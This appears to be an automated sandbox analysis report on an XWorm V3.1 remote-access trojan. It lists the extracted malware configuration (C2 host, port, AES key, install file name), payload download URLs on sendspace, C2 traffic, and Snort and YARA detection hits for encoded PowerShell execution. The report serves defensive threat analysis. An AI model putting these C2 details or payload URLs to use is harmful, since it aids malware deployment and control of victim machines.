Source: http://pesterbdd.com/images/Pester.png |
URL Reputation: Label: malware |
Source: nmds.duckdns.org |
Avira URL Cloud: Label: malware |
Source: 0000000F.00000002.3135063808.0000000023051000.00000004.00000800.00020000.00000000.sdmp |
Malware Configuration Extractor: Xworm {"C2 url": ["nmds.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"} |
Source: unknown |
HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.10:49711 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.10:49712 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.10:49718 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.10:49719 version: TLS 1.2 |
Source: |
Binary string: \??\C:\Program Files (x86)\windows mail\wab.PDB source: wab.exe, 0000000F.00000002.3136825596.0000000025368000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Xml.ni.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: System.Configuration.pdb|c,s@ source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: Accessibility.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: System.ni.pdbRSDS source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.1682044928.0000000007C22000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: Accessibility.pdb" source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: \??\C:\Windows\dll\mscorlib.pdbk8 source: wab.exe, 0000000F.00000002.3136825596.000000002534A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: $%symbols\dll\mscorlib.pdbLb source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: h1%HPRo0C:\Windows\mscorlib.pdb source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: ?^oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.Configuration.ni.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: mscorlib.ni.pdbRSDS source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: 4%%%.pdb source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.Configuration.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: 1%C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbhWa source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\symbols\exe\wab.pdb source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: wab.pdbGCTL source: wab.exe, 0000000F.00000002.3136825596.000000002533F000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Xml.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: System.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: System.Xml.ni.pdbRSDS# source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: wab.pdb source: wab.exe, 0000000F.00000002.3136825596.000000002533F000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbh source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.ni.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: Microsoft.VisualBasic.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: \??\C:\Program Files (x86)\windows mail\wab.pdb source: wab.exe, 0000000F.00000002.3136825596.0000000025368000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Windows.Forms.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: \??\C:\Windows\symbols\exe\wab.pdbK source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: mscorlib.pdb source: wab.exe, 0000000F.00000002.3136825596.0000000025341000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp, WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: System.Management.ni.pdbRSDSJ< source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: \??\C:\Windows\wab.pdb source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: wab.pdbJ# source: wab.exe, 0000000F.00000002.3136825596.000000002534A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Drawing.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: System.Management.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: C:\Windows\mscorlib.pdbpdblib.pdb_ source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: mscorlib.ni.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: System.Management.ni.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: \??\C:\Windows\mscorlib.pdb source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: @^o.pdb source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\mscorlib.pdbr8 source: wab.exe, 0000000F.00000002.3136825596.000000002534A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 \ source: wab.exe, 0000000F.00000002.3121592482.00000000075C0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Configuration.ni.pdbRSDScUN source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb@@_ source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.ni.pdb source: WERF2D5.tmp.dmp.23.dr |
Source: |
Binary string: System.Core.ni.pdbRSDS source: WERF2D5.tmp.dmp.23.dr |
Source: Traffic |
Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 12.202.180.134:8895 -> 192.168.2.10:49720 |
Source: Traffic |
Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 12.202.180.134:8895 -> 192.168.2.10:49720 |
Source: Traffic |
Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.10:49720 -> 12.202.180.134:8895 |
Source: Traffic |
Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.10:49720 -> 12.202.180.134:8895 |
Source: Joe Sandbox View |
IP Address: 69.31.136.17 |
Source: Joe Sandbox View |
IP Address: 12.202.180.134 |
Source: Joe Sandbox View |
IP Address: 104.21.28.80 |
Source: Joe Sandbox View |
IP Address: 69.31.136.57 |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/ow9148 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: www.sendspace.com Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /dlpro/3f6d43e0acc954908c31e25fcf4bf945/664f9418/ow9148/Supervene.pfb HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: fs13n3.sendspace.com Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/ougyql HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: www.sendspace.com Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG80.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: fs03n4.sendspace.com Connection: Keep-Alive Cookie: SID=5hrvd3jvoolunq5gv3jhegf975 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
DNS traffic detected: DNS query: www.sendspace.com |
Source: global traffic |
DNS traffic detected: DNS query: fs13n3.sendspace.com |
Source: global traffic |
DNS traffic detected: DNS query: fs03n4.sendspace.com |
Source: global traffic |
DNS traffic detected: DNS query: nmds.duckdns.org |
Source: powershell.exe, 00000003.00000002.1788126978.000002AD435B4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://fs13n3.sendspace.com |
Source: powershell.exe, 00000003.00000002.1879512931.000002AD51831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000000C.00000002.1669254293.00000000044FC000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000003.00000002.1788126978.000002AD417C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1669254293.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.0000000023051000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: Amcache.hve.23.dr |
String found in binary or memory: http://upx.sf.net |
Source: powershell.exe, 0000000C.00000002.1669254293.00000000044FC000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 0000000C.00000002.1675028556.0000000006D81000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.microsoft.co |
Source: powershell.exe, 00000003.00000002.1788126978.000002AD4357B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.sendspace.com |
Source: powershell.exe, 00000003.00000002.1788126978.000002AD417C1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 0000000C.00000002.1669254293.00000000043A1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: wab.exe, 0000000F.00000003.1665443342.00000000075CA000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n4.sendspace.com/ |
Source: wab.exe, 0000000F.00000003.1657420139.00000000075CA000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n4.sendspace.com/A |
Source: wab.exe, 0000000F.00000003.1657420139.00000000075CA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3121592482.00000000075AE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3121592482.00000000075C0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3121592482.0000000007591000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.1665443342.00000000075CA000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n4.sendspace.com/dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG80 |
Source: wab.exe, 0000000F.00000003.1657420139.00000000075CA000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n4.sendspace.com/yK |
Source: powershell.exe, 00000003.00000002.1788126978.000002AD435A0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n3.sendspaXpAk |
Source: powershell.exe, 00000003.00000002.1788126978.000002AD41C56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD435A0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n3.sendspace.com |
Source: powershell.exe, 00000003.00000002.1788126978.000002AD41C56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD41C52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD4357B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD435A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD4359C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n3.sendspace.com/dlpro/3f6d43e0acc954908c31e25fcf4bf945/664f9418/ow9148/Supervene.pfb |
Source: powershell.exe, 0000000C.00000002.1669254293.00000000044FC000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000003.00000002.1788126978.000002AD42A5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000003.00000002.1879512931.000002AD51831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000003.00000002.1788126978.000002AD43086000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD419ED000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com |
Source: wab.exe, 0000000F.00000002.3121592482.0000000007558000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/ |
Source: wab.exe, 0000000F.00000002.3133396783.0000000022630000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3121592482.0000000007591000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/ougyql |
Source: powershell.exe, 0000000C.00000002.1669254293.00000000044FC000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/ow9148 |
Source: powershell.exe, 00000003.00000002.1788126978.000002AD419ED000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/ow9148P |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49711 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49712 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49711 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49719 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49719 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49718 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49718 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49712 |
Source: amsi32_7776.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 4904, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\cmd.exe |
Process created: Commandline size = 6851 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 6875 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 3_2_00007FF7C193B8C2 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 3_2_00007FF7C193AB5A |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 12_2_00C4E928 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 12_2_00C4F1F8 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 12_2_00C42045 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 12_2_00C4E5E0 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 12_2_00C41FD5 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 15_2_22FDEB98 |
Source: amsi32_7776.amsi.csv, type: OTHER |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |
Source: Process Memory Space: powershell.exe PID: 4904, type: MEMORYSTR |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |
Source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |